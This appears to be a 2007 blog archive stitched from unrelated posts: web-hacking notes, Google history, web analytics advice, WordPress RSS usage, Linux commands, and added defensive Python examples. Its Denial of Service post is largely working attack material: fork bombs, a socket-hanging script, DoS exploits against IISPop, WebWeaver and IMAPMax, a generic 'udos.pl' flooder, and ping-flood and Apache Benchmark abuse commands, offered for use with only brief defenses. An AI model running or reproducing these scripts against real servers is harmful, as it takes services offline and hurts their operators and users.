CK Cybers Time

Wednesday, May 30, 2007

Hacking ( 1 )

1.0 Introduction

One-way web hacking is a technique which relies purely on HTTP traffic to attack and penetrate web servers and application servers. This technique was formulated to demonstrate that having tight firewalls or SSL does not really matter when it comes to web application attacks. The premise of the one-way technique is that only valid HTTP requests are allowed in and only valid HTTP responses are allowed out of the firewall.

My research on one-way web hacking began as early as April 2000, when I was faced with the need to upload an arbitrary file on a compromised web server which had a restrictive firewall. Since then, many other techniques have been developed, and the collection of all these techniques resulted in the creation of the one-way web hacking methodology.

One-way web hacking has been demonstrated at the Blackhat Briefings in Amsterdam 2001, Las Vegas 2001 and HACK 2002 in Kuala Lumpur.

1.1 Components of a generic web application system

There are four components in a web application system, namely the web client, which is usually a browser, the front-end web server, the application server and, for a vast majority of applications, the database server. The following diagram shows how these components fit together.

The web application server hosts all the application logic, which may be in the form of scripts, objects or compiled binaries. The front-end web server acts as the application interface to the outside world, receiving inputs from the web clients via HTML forms and HTTP, and delivering output generated by the application in the form of HTML pages. Internally, the application interfaces with back-end database servers to carry out transactions.

The firewall is assumed to be a tightly configured firewall, allowing nothing but incoming HTTP requests and outgoing HTML replies.

1.2 URL mappings to the web application system

While interacting with a web application, the URLs that get sent back and forth between the browser and the web server typically have the following format:

 http:// server / path / application ? parameters

The following diagram illustrates how different parts of the URL map to various areas in the web application system:

  • The protocol (http or https) is allowed in and out by the firewall.

  • The server and path parts are parsed by the front-end web server. Any vulnerabilities present in URL interpretation (e.g. unicode, double-decode) can be exploited by tampering with the server and path of the URL.

  • The application is executed by the application server with which it is configured or registered. Tampering with this part may result in exploiting vulnerabilities present in the application server (e.g. compiling and executing arbitrary files using the JSP servlet handler).

  • Parameters supplied to the application, if not properly validated, may result in vulnerabilities specific to that application. (e.g. inserting pipe "|" characters to the open() call in Perl)

  • If a parameter is used as a part of an SQL database query, poorly validated parameters may lead to SQL injection attacks. (e.g. execution of arbitrary commands using stored procedures such as "xp_cmdshell")
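The mapping above can be turned into a log-triage aid. The following is an added example, not code from the original article: it splits a request URL into the five parts of the format shown and attributes suspicious patterns to the layer that would parse them. It checks only the patterns the bullets name for the path and the parameters; the host name `shop.example` and all sample URLs are constructed.

```python
import re
from urllib.parse import urlsplit, unquote, parse_qsl

# The two URL-interpretation bug classes the text names for the web server.
OVERLONG_UTF8 = re.compile(r"%c[01]%[89ab][0-9a-f]", re.I)  # "unicode": overlong 2-byte form
DOUBLE_ENCODED = re.compile(r"%25[0-9a-f]{2}", re.I)         # "double-decode": an encoded "%"


def split_url(url):
    """Split a URL into protocol / server / path / application / parameters."""
    u = urlsplit(url)
    path, _, application = u.path.rpartition("/")
    return {
        "protocol": u.scheme,        # the only part the firewall looks at
        "server": u.netloc,          # parsed by the front-end web server
        "path": path + "/",          # parsed by the front-end web server
        "application": application,  # dispatched to the application server
        "parameters": u.query,       # consumed by the application and the database
    }


def triage(url):
    """Return (layer, reason) pairs for every suspicious pattern in the URL."""
    parts = split_url(url)
    findings = []
    if parts["protocol"] not in ("http", "https"):
        findings.append(("firewall", "protocol other than http/https"))

    # Front-end web server: inspect the raw path, then decode twice, because a
    # server that decodes twice sees a different path than a filter that decodes once.
    raw = parts["path"] + parts["application"]
    if OVERLONG_UTF8.search(raw):
        findings.append(("front-end web server", "overlong UTF-8 sequence in path"))
    if DOUBLE_ENCODED.search(raw):
        findings.append(("front-end web server", "double-encoded character in path"))
    decoded = unquote(unquote(raw)).replace("\\", "/")
    if ".." in decoded.split("/"):
        findings.append(("front-end web server", "dot-dot segment after decoding"))

    # The application part is reported by split_url() but not pattern-matched:
    # the text gives no pattern for the application-server case.

    # Application and database: inspect decoded parameter names and values.
    for name, value in parse_qsl(parts["parameters"], keep_blank_values=True):
        field = f"{name}={value}"
        if "|" in field:
            findings.append(("application", f"pipe character in parameter {name!r}"))
        if "xp_cmdshell" in field.lower():
            findings.append(("database", f"stored procedure name in parameter {name!r}"))
    return findings


# Constructed request URLs, one per case.
SAMPLE_URLS = [
    "http://shop.example/catalog/view.asp?id=7",
    "http://shop.example/a/..%c0%af../b.asp",
    "http://shop.example/a/..%255c../b.asp",
    "http://shop.example/cgi-bin/show.pl?file=report.txt%7C",
    "https://shop.example/catalog/view.asp?id=7+XP_CmdShell",
]

if __name__ == "__main__":
    for sample in SAMPLE_URLS:
        print(sample)
        for layer, reason in triage(sample) or [("-", "nothing flagged")]:
            print(f"    {layer}: {reason}")
```

All five URLs pass a firewall that filters on protocol alone, which is the premise of the one-way technique; the findings show which component behind it has to do the validation.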

A detailed discussion can be found in Chapter 5 of "Web Hacking: Attacks and Defense" [1]

Tuesday, May 29, 2007

History of Google

Google is an American company best known for its search engine, which is also named Google.

Google, Inc. (NASDAQ: GOOG) was founded on 7 September 1998 in the garage of a friend's house in Menlo Park, California. In February 1999, the company moved to an office at 165 University Ave., Palo Alto, California, before finally moving to the "Googleplex" at the end of that year.

Google is an Internet search engine based in the United States. Google is one of the most popular search engines on the web and receives at least 200 million search requests every day through its site and the web sites of its clients such as America Online (AOL). Google's headquarters are (at the "Googleplex") in Mountain View, California.

History

Google search results page.

Google began as a research project by two Stanford University Ph.D. students, Larry Page and Sergey Brin, in early 1996. They developed the theory that a search engine based on mathematical analysis of the relationships between web sites would give better results than the basic search techniques in use at the time. The system was originally named BackRub because it used backlinks to estimate how important a site was.

Convinced that the pages with the most links pointing to them from other relevant web pages were the most relevant pages, Page and Brin decided to test their thesis as part of their studies; this became the foundation of their search engine. They formally incorporated their company, Google Inc., on 7 September 1998.

Google became popular among Internet users because of its simple, 'clean' design and its relevant search results. Advertisements are sold by keyword so that they are more relevant to users, and the advertisements are required to be text-only so that the page design stays tidy and pages load quickly. The concept of selling advertisements by keyword was pioneered by Overture [1], formerly named GoTo.com. At a time when most other dotcom companies were going bankrupt, Google quietly strengthened its influence and turned a profit.

In September 2001, Google's ranking mechanism (PageRank) was granted a US patent. The patent was officially assigned to Leland Stanford University and lists Lawrence Page as the inventor. [2]

In February 2003, Google bought Pyra Labs, owner of Blogger, a pioneering and leading weblog hosting web site. The acquisition appeared inconsistent with Google's general mission, but the move allowed Google to use information from blog posts to improve the speed and relevance of articles in Google News.

At its peak in early 2004, Google handled almost 80 percent of all search requests on the Internet through its web site and clients such as Yahoo!, AOL and CNN. [3] Google's share has fallen since Yahoo! dropped Google's search technology in February 2004 in order to use its own independent search results.


Measuring Web Site Success

10 Steps to Measuring Web Site Success

Is your Web site working? How would you know? Clients constantly ask me what they should be measuring, and my answer is always, “It depends.” So for all of you who have wondered the same thing, here is the handy-dandy Sterne How-To Guide for measuring the success of your Web site.

1. Identify Key Stakeholders

Who cares? Inside your company, I mean.

Ensuring the success of the company Web site is not something that belongs exclusively to one job function or title. It's not something that can be forced on somebody. If you want your site to be successful and you want to measure that success, then you'll have to round up the people who are vitally interested.

Perhaps they have an agenda and see the Web as a way to help. Perhaps they are techno-geeks and just love to mess around with whatever is on the leading edge. Maybe they like the distinction of being an Internet person. The people in your company who care about your site enough to complain about it should also be asked to join the team willing to take some responsibility for it.

2. Identify Key Stakeholders' Primary Goals

With the stakeholders listed, cataloged, alphabetized and (with any luck) in the same room, find out what they want. This is a multi-tiered question that involves finding out what they want out of the Web site on behalf of the company, on behalf of their departments and as individuals. Sometimes these conversations even get down to how individuals are compensated.

You'll need to get the comprehensive list of objectives, goals and aspirations for everybody who has a strong enough opinion about the site to come to a steering committee meeting. But before you start prioritizing those desired outcomes, it's time to shift your attention outward. There's another batch of people whose opinions about your site matter: site visitors.

3. Identify the Most Important Site Visitors

I've had dozens of conversations with corporate executives about who comes to their Web site and which among them are the most important. The answers are all over the map. They talk about the type of visitor that:

· Shows up the most often

· Stays the longest

· Looks at the most pages

· Buys the most stuff

· Buys the most frequently

· Spends the most money

Generally, people tend to agree that the most important type of visitor is the type that's the most profitable over some period of time. But your mileage may vary.

4. Identify the Most Important Visitors' Primary Goals

This is really pretty simple: ease of use, speed, selection, price. It's all about the user experience. Can they quickly and easily get what they want?

5. Prioritize Everybody's Goals

Now, you finally have all the cards on the table. You know what everybody wants and can start horse-trading. A great many goals will synchronize, but you'll also find that some people have strong opinions about whether raising revenue is more important than lowering costs, or if improving customer satisfaction is job one.

This is a political ball game. The person who feels the strongest may or may not be sidelined by the person with the most seniority. The person with the biggest budget may or may not be outflanked by the person with the closest ties to executive management. This is the part that always reminds me of why I don't work in a corporate environment and why such places need outside consultants every now and then.

At the end of the scrimmage, you'll end up with a list of priorities that may or may not be the very best, but at least they are identified, discussed and prioritized by one and all in the room. Many of those people will not have their way, but at least they were present during the process and understand why the spinning logo is deemed more important than revenues at the moment.

6. Determine Critical Metrics

Which metrics signal whether you are moving closer to your goals or further away? If the main goal is More Visitors, then a clear definition of how visitors are counted is necessary (cookies? logins? JavaScript?). If the main goal is revenue, then you'll need to identify the factors that make up the process of getting from awareness to interest to sale. If customer satisfaction is in the mix, then one and all must agree on the methods used to gather satisfaction data and how to weight it.

Again, the accord among the players is more important than the result.

7. Identify the Necessary Technology

With clear goals and metrics in mind, the selection of a Web analytics vendor becomes vastly simpler. You are no longer choosing between an enormous variety of esoteric technologies, but merely asking whether specific data can be captured, collated, correlated and reported—at what cost—and with what flexibility. Flexibility accounts for the fact that you will change your mind in the future about what else you wish to measure.

8. Check References

A robust set of data gathering technologies, a solid financial foundation and a really nice users' group are all well and good, but how does your prospective Web analytics vendor treat their clients? Talk to their references and ask them for the names of other users your vendor might have been reluctant to reveal. Keep asking questions.

9. Distribute Only the Data That Drives Business Decisions

Do not fall back into the briar patch of circulating reports for the sake of spreading the data around. Dole out those reports only to those who need them to make business decisions. Too much data becomes overwhelming and therefore useless.

10. Accountability, Responsibility, Visibility

Liberté, Egalité and Fraternité may have fueled the French Revolution, but the more mundane accountability, responsibility and integrity will determine whether your Web analytics efforts are going to pay off.

Once you have decided what's important and how to measure it, you have to decide what you're going to do about the results, how often you're going to do it and who is going to be responsible. When the numbers are periodically published, whose work product gets reviewed? When the numbers are going south, who gets the bamboo shoots under the fingernails? When the numbers improve, who gets the Employee of the Month parking space?

Don't go through all this effort just so you can say, “Yes, we do Web analytics and we have the reports right here to prove it!” Instead, make sure those reports are an integral part of a process of constant improvement. Then you'll know whether your Web site is working or not.

Jim Sterne (jsterne@targeting.com) is the founder and director of Target Marketing (www.targeting.com). He is also a senior contributor at Marketing Profs.

Friday, May 25, 2007

Denial Of Services

Denial of Services

What is Denial of Service (DoS)?
Denial of Service is the activity of obstructing the operation of a service or shutting it down, so that entitled/interested users cannot use the service. The end result of this activity is the disruption of the victim's activities, which can be fatal (in certain cases).
Basically, Denial of Service is an attack that is hard to counter, because of the risk inherent in public services, where the admin is in the confusing position of balancing service and convenience against security. As we know, convenience is inversely proportional to security. So the risks that may arise always follow this law.
Some DoS activities are:
1. 'Flooding' a server.
2. Cutting the connection between 2 machines.
3. Preventing the victim from being able to use a service.
4. Damaging the system so that the victim cannot use a service.

Attackers' motives for Denial of Service
According to Hans Husman (t95hhu@student.tdb.uu.se), crackers have several motives for carrying out Denial of Service, namely:
1. Sub-cultural status.
2. To gain access.
3. Revenge.
4. Political reasons.
5. Economic reasons.
6. Criminal purposes/mischief.

Subcultural status in the hacker world is a show of force, or more precisely what we might call a search for identity. It is a common activity among young hackers to show off their ability, and Denial of Service is an activity of hackers early in their careers.
Political and economic reasons are also the most relevant reasons at present. We can see in 'cyber war' that DoS attacks are even carried out in a distributed manner, better known as 'distributed Denial of Service'. Some virus attacks such as 'code-red' even carry out DoS attacks automatically by using infected computers; such a computer is called a 'zombie' in the jargon.
More relevant still, mischief is the motive most often encountered. It is not difficult to obtain DoS programs such as nestea, teardrop, land, boink, jolt and vadim. DoS programs can carry out Denial of Service attacks very precisely, and most importantly they are very easy to use. A cracker only needs to type one command line at a Linux shell, of the form ./nama_program argv argc ...

Denial of Service, an attack that exhausts resources.
Basically, crippling a service requires heavy resource consumption, so that the attacked computer/machine runs out of resources and hangs. Some of the types of resource that are exhausted include:
A. Swap Space
B. Bandwidth
C. Kernel Tables
D. RAM
E. Disk
F. Caches
G. INETD

A. Swap Space
Almost all systems use hundreds of MB of swap space to serve client requests. Swap space is also used to fork child processes. In any case, swap space changes constantly and is used very heavily. Some Denial of Service attacks try to fill this swap space.

B. Bandwidth
Some Denial of Service attacks exhaust bandwidth.

C. Kernel Tables
Attacks on kernel tables can have very bad effects on the system. Memory allocation to the kernel is also a sensitive attack target. The kernel has a kernelmap limit; if the system reaches it, the system can no longer allocate memory for the kernel and must be rebooted.

D. RAM
Denial of Service attacks consume a lot of RAM, so that the system, like it or not, must be rebooted.

E. Disk
Classic attacks are often carried out by filling the disk.

F. Caches

G. INETD
Once INETD crashes, all services that go through INETD will stop working.

Techniques for Carrying Out Denial of Service.
Carrying out DoS is actually not difficult. Since DoS is an adverse effect on a public service, the most effective way to stop it is to shut the service down. But of course this is no fun and not very interesting either.

We will discuss the types of DoS attack.
• SYN-Flooding
SYN-Flooding is a network Denial of Service that exploits a 'loophole' at the time a TCP/IP connection is established. Recent Linux kernels (2.0.30 and later) have a configuration option to prevent Denial of Service by preventing/denying crackers access to the system.
• Pentium 'F00F' Bug
A Denial of Service attack against Pentium processors that causes the system to reboot. It does not depend on the operating system used, but more specifically on the processor used, namely the Pentium.
• Ping Flooding
Ping Flooding is a simple brute-force Denial of Service. If the attack is carried out by an attacker with better bandwidth than the victim, the victim machine cannot send data packets into the network.
This happens because the victim machine is flooded with ICMP packets.
A variant of this attack is called "smurfing" (http://www.quadrunner.com/~chuegen/smurf.txt).

Attacks using exploits.

Several things must be understood before carrying out this attack:
A. The attack needs a Linux shell (Unix/Comp)
B. Obtain exploits at: http://packetstormsecurity.nl (use the search function to make it easier)
C. Uses/needs GCC (GNU C Compiler)

1. KOD (Kiss of Death)
A Denial of Service tool that can be used to attack MS Windows on port 139 (the netbios-ssn port). The main function of this tool is to hang/blue-screen the victim's computer.
Usage:
A. Obtain the file kod.c
B. Compile with GCC: $ gcc -o kod kod.c
C. Use: $ kod [ip_korban] -p [port] -t [hits]
The weakness of this tool is that not all attacks succeed; it depends on the operating system type and the configuration of the target server (for example: blocking).

2. BONK/BOINK
Bonk is the basis of teardrop (teardrop.c). Boink is an improvement on bonk.c that can crash MS Windows 9x and NT machines.

3. Jolt
Jolt is very effective at freezing Windows 9x and NT. Jolt works by sending a very large series of spoofed and fragmented ICMP packets to the victim.

4. NesTea
This tool can freeze Linux with kernel version 2.0 and below and early versions of Windows. The improved version of NesTea is known as NesTea2.

5. NewTear
A variant of teardrop (teardrop.c), but different from bonk (bonk.c).

6. Syndrop
A 'combined attack' of TearDrop and TCP SYN flooding. The attack targets are Linux and Windows.

7. TearDrop
TearDrop sends fragmented IP packets to (Windows) computers connected to the network. The attack exploits overlapping IP fragments, a bug present in Windows 9x and NT. The effect of this attack is a Blue Screen of Death.

Direct attacks (+ 31337)

1. Ping Flood
Root access is needed to do this on a Linux system. The implementation is simple: sending data packets on a massive scale.
bash # ping -fs 65000 [ip_target]

2. Apache Benchmark
WWW benchmark programs are used to measure the performance (strength) of a web server, but misuse is not out of the question.
bash $ /usr/sbin/ab -n 10000 -c 300 \
http://korban.com/cgi-bin/search.cgi?q=kata+yang+cukup+umum
(typed on one line!)
This makes 10000 requests, 300 in parallel, to the host korban.com

3. Hanging Sockets
Apache has a small connection capacity. The stock configuration from the Apache Software Foundation is MaxClients 150, which means the number of connections allowed to access Apache is limited to 150 clients. This number can in effect be somewhat lower, given that browsers make more than one simultaneous request over separate connections.
The attacker simply connects and then stays silent; Apache will then wait for the time set by the TimeOut directive (default 5 minutes). By sending enough simultaneous requests, the attacker pushes against the MaxClients maximum. As a result, clients accessing Apache are delayed, and if the TCP backlog is exceeded, connections are refused, as if the victim server were dead.

Script gs.pl (socket hanging)
#!/usr/bin/perl
#
# Script name : gs.pl
# Type : Denial of Service (DoS)
# Auth : MOBY || eCHo --> moby@echo.or.id || mobygeek@telkom.net
# URL : www.echo.or.id
#
use IO::Socket;
if (!$ARGV[1]) {
print "Gunakan: perl gs.pl [host] [port] \n";
exit;
}
for (1..1300) {
$fh{$_}=new IO::Socket::INET
PeerAddr=> "$ARGV[0]",
PeerPort=> "$ARGV[1]",
Proto => "tcp"
or die; print "$_\n"
}
# END. 27 October 2003
# Run from several login shells (computers)!

DoS-ing Apache again !!

Some example Perl scripts for carrying out DoS-ing locally.

1. Fork bomb, exhaust RAM
#!/usr/bin/perl
fork while 1;

2. Exhaust CPU
#!/usr/bin/perl
for (1..100) { fork or last }
1 while ++$i

3. Exhaust memory
#!/usr/bin/perl
for (1..20) { fork or last }
while(++$i) { fh{$i} = "X" x 0xff; }

4. Input Flooding Attacks
I observed this attack in several advisories on BugTraq. A remote buffer overflow that produces a segmentation fault (seg_fault) can be triggered remotely if the daemon (server) does not verify its input, so that the input floods the buffer and causes the program to be terminated forcibly.

Several 'proofs of concept' can be studied through the following examples.

1. Attack on the IISPop EMAIL Server.
Software : Email server
Vendor : http://www.curtiscomp.com/
TYPE : Remote DoS
IISPop will crash if attacked by sending a data packet of 289999 bytes; the vulnerable versions that have been tested are V: 1.161 and 1.181

Script: iispdos.pl
#!/usr/bin/perl -w
#
# $0_ : iispdos.pl
# Attack type : Denial of service
# Target : IISPop MAIL SERVER V. 1.161 & 1.181
# Auth : MOBY & eCHo -> moby@echo.or.id || mobygeek@telkom.net
# URL : www.echo.or.id
#
use IO::Socket;
if (!$ARGV[0]) {
print "Gunakan: perl iispdos.pl [host] \n";
exit;
}
# Data 289999 bytes
$buff = "A" x 289999;
print "Connecting ... >> $ARGV[0] \n";
$connect = new IO::Socket::INET (
PeerAddr=> "$ARGV[0]",
PeerPort=> "110",
Proto=> "tcp") or die;
print "Error: $_\n";
print "Connect !!\n";
print $connect "$buff\n";
close $connect;
print "Done \n";
print "POST TESTING setelah serangan \n";
print "TEST ... >> $ARGV[0] \n";
$connect = new IO::Socket::INET (
PeerAddr => "$ARGV[0]",
PeerPort => "110",
Proto => "tcp") or die;
print "Done !!, $ARGV[0] TEWAS !! \n";
print "Gagal !! \n";
close $connect;
# END.

2. Killing wzdftpd.
Software : wzdftpd
Vendor : http://www.wzdftpd.net
Proof of Concept:
% telnet 127.0.0.1 21
Trying 127.0.0.1...
Connected to localhost.novel.ru.
Escape character is '^]'.
220 wzd server ready.
USER guest
331 User guest okay, need password.
PASS any
230 User logged in, proceed.
PORT
Connection closed by foreign host.
% telnet 127.0.0.1 21
Trying 127.0.0.1...
telnet: connect to address 127.0.0.1: Connection refused
telnet: Unable to connect to remote host
wzdftpd crashes after being given the PORT command!

3. 32700-character attack, DoS against BRS WebWeaver.
Software : BRS WebWeaver V. 1.04
Vendor : www.brswebweaver.com
BugTraqer : euronymous /F0KP
}------- start of fadvWWhtdos.py ---------------{
#! /usr/bin/env python
## #!/usr/bin/python (Py Shebang, MOBY)
###
# WebWeaver 1.04 Http Server DoS exploit
# by euronymous /f0kp [http://f0kp.iplus.ru]
########
# Usage: ./fadvWWhtdos.py
########
import sys
import httplib
met = raw_input(""" What kind request you want make to crash webweaver?? [ HEAD/POST ]:
""") target = raw_input("Type your target hostname [ w/o http:// ]: ")
spl = "f0kp"*0x1FEF
conn = httplib.HTTPConnection(target)
conn.request(met, "/"+spl)
r1 = conn.getresponse()
print r1.status
}--------- end of fadvWWhtdos.py ---------------{
The attack above sends 32700 characters, which causes the server to crash!

4. Buffer Overflow in MailMAX 5
Software : IMAP4rev1 SmartMax IMAPMax 5 (5.0.10.8)
Vendor : http://www.smartmax.com
BugTraqer : matrix at 0x36.org
A remote buffer overflow occurs when a user sends input (arg) to the SELECT command. The effect of this attack is that the server stops and must be restarted manually.
Example exploitation:
--------[ transcript ]-------
nc infowarfare.dk 143
* OK IMAP4rev1 SmartMax IMAPMax 5 Ready
0000 CAPABILITY
* CAPABILITY IMAP4rev1
0000 OK CAPABILITY completed
0001 LOGIN "RealUser@infowarfare.dk" "HereIsMyPassword"
0001 OK User authenticated.
0002 SELECT "aaa...[256]...aaaa"
--------[ transcript ]-------
Note: the example exploitation above uses NetCat (nc); you can get this tool at the URL http://packetstormsecurity.nl with the keyword 'nc' or 'netcat'.

If we look closely, flooding attacks share a common trait, namely, of course, flooding the input with large data. The attack is more effective if carried out from an executing computer with wide bandwidth.
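Since every input-flooding case above comes down to a daemon that does not verify the size of its input, the server-side check is worth seeing. The following is an added example, not code from the original article or from any of the products named: a line reader for a text protocol that enforces a maximum command length, never buffers more than a fixed amount, and stays in sync with the stream after an oversized line. The 512-byte limit and the sample stream are constructed; the 289999-byte size is the one quoted for the IISPop case.

```python
import io


class LineTooLong(Exception):
    """Raised when a command line exceeds the configured limit."""


class BoundedLineReader:
    """Read newline-terminated commands while holding at most limit + chunk bytes."""

    def __init__(self, stream, limit=512, chunk=4096):
        self.stream = stream   # any object with read(n) -> bytes (socket file, BytesIO)
        self.limit = limit     # assumed maximum command length, excluding the newline
        self.chunk = chunk
        self.buf = b""
        self.peak = 0          # largest buffer ever held, for inspection

    def read_command(self):
        """Return the next command without CR/LF, or None at end of stream.

        An oversized line is discarded up to its newline and reported with
        LineTooLong, so the caller can answer with an error and keep serving.
        """
        overflow = False
        while True:
            newline = self.buf.find(b"\n")
            if newline != -1:
                line, self.buf = self.buf[:newline], self.buf[newline + 1:]
                if overflow or len(line) > self.limit:
                    raise LineTooLong(f"command longer than {self.limit} bytes")
                return line.rstrip(b"\r")
            if len(self.buf) > self.limit:
                # No newline within the limit: drop what we hold, keep skipping.
                overflow = True
                self.buf = b""
            data = self.stream.read(self.chunk)
            if not data:
                if overflow:
                    raise LineTooLong(f"command longer than {self.limit} bytes")
                if self.buf:
                    line, self.buf = self.buf, b""
                    return line.rstrip(b"\r")
                return None
            self.buf += data
            self.peak = max(self.peak, len(self.buf))


# Constructed client stream: a normal command, one oversized line, a normal command.
SAMPLE_STREAM = b"USER guest\r\n" + b"A" * 289999 + b"\r\n" + b"QUIT\r\n"


def replay(stream_bytes, limit=512):
    """Feed a byte stream through the reader and record what the daemon would see."""
    reader = BoundedLineReader(io.BytesIO(stream_bytes), limit=limit)
    seen = []
    while True:
        try:
            command = reader.read_command()
        except LineTooLong:
            seen.append("REJECTED")
            continue
        if command is None:
            return seen, reader.peak
        seen.append(command.decode("ascii", "replace"))


if __name__ == "__main__":
    commands, peak = replay(SAMPLE_STREAM)
    print(commands, "peak buffer:", peak)
```

The oversized line is rejected without ever being held in memory in full, and the command that follows it is still parsed correctly.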

By studying what the attacks have in common, the steps are:
A. Connect to the victim (host, port).
B. Send a large amount of data.
C. Disconnect > done.
From the steps above, we can build a universal script to carry out DoS attacks.
The script needs 3 arguments: target_address (target host/IP), target_port (port to connect to on the victim server), and data (the amount of data to send).
-- udos.pl --
#!/usr/bin/perl
#
# $0 : udos.pl
# Auth : MOBY & eCHo -> moby@echo.or.id | mobygeek@telkom.net
# URL : www.echo.or.id
#
use IO::Socket;
#
if (!$ARGV[2]) {
print "Gunakan % perl udos.pl [host] [port] [data] \n";
print "Contoh :\n";
print "\t $ perl udos.pl 127.0.0.1 21 50000 \n";
exit;
}
# Prepare the data
$buffer = "A" x $ARGV[2];
# Connect -> victim
print "Connecting ... -> $ARGV[0] \n";
$con = new IO::Socket::INET (
PeerAddr=> "$ARGV[0]",
PeerPort=> "$ARGV[1]",
Proto=> "tcp") or die;
print "Error: $_ \n";
# Connect !
print "Connect !! \n";
print $con "$buffer\n";
close $con;
print "Done. \n";
print "POST TESTING setelah serangan \n";
print "TEST ... >> $ARGV[0] \n";
$connect = new IO::Socket::INET (
PeerAddr => "$ARGV[0]",
PeerPort => "$ARGV[1]",
Proto => "tcp") or die;
print "Done !!, $ARGV[0] TEWAS !! \n";
print "Gagal !! \n";
close $connect;
# End.
-- udos.pl --

The simple script above only connects to the victim server, then sends the flood and performs post-testing. With a little programming you can build a 'Mass Flooder' or 'Brute Force Flooder', depending on your creativity!

Countering Denial of Service attacks.
Honestly, this is the hardest part. You can see how easy it is to use sploits/tools to freeze MS Windows, or how easy it is to do input flooding and build your own tool. But Denial of Service is a problem of public services. It is the same as owning a shop: a group of bad people could come in all at once so that your shop is full. You could deal with this 'attack' by 'closing' your shop, and that is the most effective way, but such a childish answer is certainly not what you are hoping for.

• Always Up 2 Date.
As in the attack examples above, SYN flooding is very effective at freezing Linux kernel 2.0.*. In this case Linux kernel 2.0.30 and later is robust enough to withstand the attack, because version 2.0.30 has an option to deny crackers access to the system.

• Follow security developments
This is very effective in preventing illegal damage to the system. Many admins are too lazy to follow the latest issues in the security world. The worst effect is that a 'diligent', 'tenacious' and 'trained' cracker will find it very easy to enter the system and do damage, and carrying out a Denial of Service cannot be ruled out.
Related to 'Always Up 2 Date', direct Denial of Service by flooding can be addressed by installing the latest patch from the vendor or by updating.

• Techniques for securing Apache httpd.
Preventing the Apache Benchmark attack. This is actually very hard to deal with. You can identify the perpetrator and block them manually through the firewall or Apache's access control mechanism (Order, Allow from, Deny from). Of course this technique is very tedious, and as an admin you must be meticulous. Lowering MaxClients is also a good idea; by analogy, limiting the number of visitors will protect your shop from 'Denial of Service'. Also don't forget to add RAM.

• Preventing non-electronic attacks.
The most effective attacks are essentially local. Besides being effective, they are also very dangerous. Never think your system is truly secure, or that all users are 'good' people. Consider all aspects. You can apply firm rules and sanctions to deter users from attacking from the inside. This may be quite effective if supported by mature thinking from the admin and the users concerned.
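The manual identification step in the Apache item above can be partly automated. The following is an added example, not code from the original article: it counts established connections to the web port per source address in `netstat -tn` style output, flags any source holding more than a chosen share of MaxClients, and prints the matching Order/Allow/Deny lines. The sample output, all addresses and the 20 % threshold are constructed; netstat does not show how long a connection has been idle, so a flagged source still needs a look before it is blocked.

```python
from collections import Counter


def connections_per_source(netstat_text, port=80):
    """Count ESTABLISHED TCP connections to the local port, keyed by remote IP."""
    counts = Counter()
    for line in netstat_text.splitlines():
        fields = line.split()
        # Expected columns: proto, recv-q, send-q, local addr, foreign addr, state
        if len(fields) < 6 or not fields[0].startswith("tcp"):
            continue
        if fields[5] != "ESTABLISHED":
            continue
        local_port = fields[3].rsplit(":", 1)[-1]
        if local_port != str(port):
            continue
        remote_ip = fields[4].rsplit(":", 1)[0]
        counts[remote_ip] += 1
    return counts


def suspects(counts, max_clients=150, share=0.2):
    """Return sources holding more than `share` of the MaxClients slots."""
    limit = max_clients * share
    return sorted(ip for ip, held in counts.items() if held > limit)


def deny_block(ips):
    """Build access-control lines using the 2.2-style directives named in the text."""
    return ["Order Allow,Deny", "Allow from all"] + [f"Deny from {ip}" for ip in ips]


def sample_line(remote, remote_port, state="ESTABLISHED", local_port=80):
    """Format one constructed netstat row for the sample below."""
    return (f"tcp        0      0 192.0.2.10:{local_port}"
            f"        {remote}:{remote_port}        {state}")


# Constructed sample: one source holding 40 slots, ordinary visitors, and noise
# (a TIME_WAIT entry and an SSH session) that must not be counted.
SAMPLE_NETSTAT = "\n".join(
    ["Proto Recv-Q Send-Q Local Address           Foreign Address         State"]
    + [sample_line("203.0.113.50", 40000 + i) for i in range(40)]
    + [sample_line("198.51.100.7", 51000 + i) for i in range(3)]
    + [sample_line("198.51.100.9", 52000, state="TIME_WAIT"),
       sample_line("198.51.100.9", 52001, local_port=22)]
)

if __name__ == "__main__":
    per_source = connections_per_source(SAMPLE_NETSTAT)
    for ip, held in per_source.most_common():
        print(f"{ip:15} {held:3} of 150 slots")
    print("\n".join(deny_block(suspects(per_source))))
```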

Source : IlmuKomputer.com (Haddad)

Wednesday, May 16, 2007

RSS Function

Retrieves an RSS feed and parses it. Uses the MagpieRSS and RSSCache (http://magpierss.sourceforge.net/) functions for parsing and automatic caching and the Snoopy HTTP client (http://sourceforge.net/projects/snoopy/) for the actual retrieval.

Usage

<?php
include_once(ABSPATH . WPINC . '/rss.php');
$rss = fetch_rss($uri);
?>

Example

To get and display a list of links for an existing RSS feed:

<?php include_once(ABSPATH . WPINC . '/rss.php'); ?>
<?php $rss = fetch_rss('http://example.com/rss/feed/goes/here'); ?>


Parameters

$uri
(URI) The URI of the RSS feed you want to retrieve. The resulting parsed feed is returned, with the more interesting and useful bits in the items array.

Tuesday, May 15, 2007

Basic Linux Commands

Basic Linux Commands

mkdir - make directories

Usage

mkdir [OPTION] DIRECTORY

Options

Create the DIRECTORY(ies), if they do not already exist.

Mandatory arguments to long options are mandatory for short options too.

-m, --mode=MODE set permission mode (as in chmod), not rwxrwxrwx - umask

-p, --parents no error if existing, make parent directories as needed

-v, --verbose print a message for each created directory

--help display this help and exit

--version output version information and exit

cd - change directories

Use cd to change directories. Type cd followed by the name of a directory to access that directory. Keep in mind that you are always in a directory and can navigate to directories hierarchically above or below.

mv - change the name of a directory

Type mv followed by the current name of a directory and the new name of the directory.

Ex: mv testdir newnamedir

pwd - print working directory

pwd shows the full path to the directory you are currently in. This is very handy to use, especially when performing some of the other commands on this page.

rmdir - Remove an existing directory

rm -r

Removes directories and files within the directories recursively.

chown - change file owner and group

Usage

chown [OPTION] OWNER[:[GROUP]] FILE

chown [OPTION] :GROUP FILE

chown [OPTION] --reference=RFILE FILE

Options

Change the owner and/or group of each FILE to OWNER and/or GROUP. With --reference, change the owner and group of each FILE to those of RFILE.

-c, --changes like verbose but report only when a change is made

--dereference affect the referent of each symbolic link, rather than the symbolic link itself

-h, --no-dereference affect each symbolic link instead of any referenced file (useful only on systems that can change the ownership of a symlink)

--from=CURRENT_OWNER:CURRENT_GROUP change the owner and/or group of each file only if its current owner and/or group match those specified here. Either may be omitted, in which case a match is not required for the omitted attribute.

--no-preserve-root do not treat `/' specially (the default)

--preserve-root fail to operate recursively on `/'

-f, --silent, --quiet suppress most error messages

--reference=RFILE use RFILE's owner and group rather than specifying OWNER:GROUP values

-R, --recursive operate on files and directories recursively

